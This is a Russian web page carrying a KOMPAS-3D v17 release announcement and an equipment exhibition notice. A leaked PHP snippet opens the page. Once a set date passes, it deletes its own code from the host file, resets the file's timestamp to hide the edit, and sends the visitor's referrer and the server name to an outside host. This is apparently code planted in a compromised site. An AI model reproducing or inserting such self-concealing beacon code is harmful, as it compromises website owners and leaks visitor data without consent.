check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456755828){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776972&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/views.php"); } КОМПАС-3D v17. По-настоящему крутая версия уже с вами!
 

ГеММа-3D

СОВЕРШЕНСТВО ТЕХНОЛОГИЙ РОССИИ

  • Увеличить размер шрифта
  • Размер шрифта по умолчанию
  • Уменьшить размер шрифта

КОМПАС-3D v17. По-настоящему крутая версия уже с вами!

E-mail Печать PDF

Вы его ждали, и вот он здесь: АСКОН объявляет о выходе КОМПАС-3D v17 – версии, которая позволит повысить скорость работы инженера на 20%! Кардинально измененные интерфейс и логика работы в системе, новые и словно заново родившиеся команды, бесшовно интегрированные в интерфейс КОМПАС-3D приложения, еще более свободный импорт и экспорт моделей... В общем, проектируйте и получайте удовольствие!

В новой версии максимум пространства отведено моделированию и минимум — самому интерфейсу. Теперь инструменты КОМПАС-3D будут под рукой там, где это удобно. Команда КОМПАС сделала все, чтобы инженер, работая над своей задачей, не отвлекался от идеи на кнопки и переключатели, а был сконцентрирован на объекте, над которым трудится — будь то большая сборка, отдельная деталь, чертеж, спецификация или просто текстовый документ. Внимание пользователя в КОМПАС-3D v17 приковано именно к тому, что он создает, а не к кнопкам, которые для этого необходимы.

Интерфейс v17 учитывает условия многочасовой работы инженеров — запас контрастности позволяет работать при разном освещении, не напрягая зрение; а также специфику современных широкоформатных мониторов и даже смысловую нагрузку цветов — теперь пользователи могут выбирать 16 комбинаций цветовых схем в темной и светлой вариациях.

КОМПАС-3D v17 – это конкурентоспособная по функционалу и эргономике система проектирования мирового уровня. Например, в новой версии реализована актуальная для многих инженеров поддержка многомониторной работы — одновременно можно работать со сборкой и спецификацией, деталью и чертежом. Еще v17 умеет «подхватывать» лицензию на лету при потере связи с сервером лицензии или случайном изъятии физического ключа. Существенно увеличилась производительность системы при работе с насыщенными чертежами: перестраивается только видимая область чертежа, все остальное остается за кадром. Появилась удобная возможность свободного перемещения компонентов в сборке, не зафиксированных сопряжениями, без вызова каких-либо команд — как говорится, бери и тащи!


Само собой, не остались без новинок и приложения. Валы и механические передачи 3D позволяют создавать реалистичную резьбу, а в Оборудование:Металлоконструкции максимально автоматизирован процесс подготовки документации на спроектированную конструкцию. Кроме того, прямо внутри среды КОМПАС-3D появились и новые приложения! КОМПАС-Эксперт предназначен для автоматической проверки документов по заданным типам тестов на соответствие стандартам оформления, ограничительным перечням предприятия и правилам работы в КОМПАС-3D — реализовано уже более 80 проверок и их число растет. Еще одна новинка - приложение для проведения расчетов и построения чертежей и моделей часовых передач «Валы и механические передачи 3D. Часовые механизмы».

Хотите увидеть эти и другие новинки в действии и понять, как далеко шагнул новый КОМПАС-3D? Участвуйте в промотуре «КОМПАС-3D v17. Зарядись обновлением!», который стартует 19 апреля и пройдет более чем в 30 городах России и СНГ. На встречах с командой КОМПАС вы сможете узнать, где именно кроется прирост производительности в 20%, откроете секреты быстрого проектирования в новом интерфейсе и лично убедитесь в эргономичности v17.

Новый интерфейс и мощь функционала версии уже получили признание пользователей. 1500 человек смогли оценить преимущества КОМПАС-3D v17 в ходе бета-тестирования. Кроме того, более 600 предприятий поверили в новую версию еще на стадии ее разработки и оформили предзаказ v17 в рамках опережающего обновления: счастливчики получат весь арсенал v17 первыми, просто скачав новую версию из личного кабинета сайта технической поддержки! Однако с премьерой версии выгодные условия по переходу на v17 не заканчиваются: например, предприятия могут воспользоваться акцией «Трейд-ин. Замещение» по замене импортных САПР на КОМПАС-3D.


Вот с чего начнется ваше погружение в новую версию!

Кстати, пока шла разработка новой версии, команда КОМПАС-3D не раз делилась инсайдерскими подробностями, раскрывала подходы к тестированию, знакомила пользователей с предстоящими переменами. Хотите встретить v17 во всеоружии? Тогда кликайте!

КОМПАС-3D v17: всё тайное становится явным

Бета-тест КОМПАС-3D v17: знакомимся со Строительной конфигурацией

Скачать демоверсию


Источник.
 

Добавить комментарий


Защитный код
Обновить

Пользовательский поиск

Реклама


Случайная новость

Традиционная выставка оборудования Deckel Maho Gildemeister в России


Наш партнер - Новосибирский САПР Центр приглашает Вас на традиционную осеннюю выставку оборудования Deckel Maho Gildemeister в Новосибирске.

Оборудование DMG – это признанный во всем мире стандарт качества. Но чтобы дорогостоящие станки эффективно работали на Вашу компанию, необходимо комплексное решение для производства.
Стоит подчеркнуть, что выставка освещает не только новинки оборудования DMG, но и вопросы по подбору инструмента и оснастки, а также учебные проекты DMG и современные финансовые механизмы.
На выставке вы сможете обсудить все ключевые моменты, которые являются определяющими при покупке и внедрении оборудования, а именно:
- цена и условия оплаты;
- сроки поставки;
- пуско-наладочные работы;
- инструмент и оснастка;
- программное обеспечение;
- обучение операторов станков и технологов-программистов ЧПУ.

ОСНОВНЫЕ ТЕМЫ ВЫСТАВКИ:
- Инновационные станки концерна DMG – DMG Ecoline, новинки и оригинальные решения.
- Учебные проекты DMG: для промышленности и учебных заведений (ВУЗ, СПО, НПО).
- Продукты DMG: новое, выставочное, подержанное оборудование.
- Применение инструментов и оснастки
- Приобретение оборудования в лизинг. Уникальное решение от «МТЕ-Финанс»

По всем вопросам обращайтесь:

НТЦ ГеММа (495)777-59-29
gemma@gemma.ru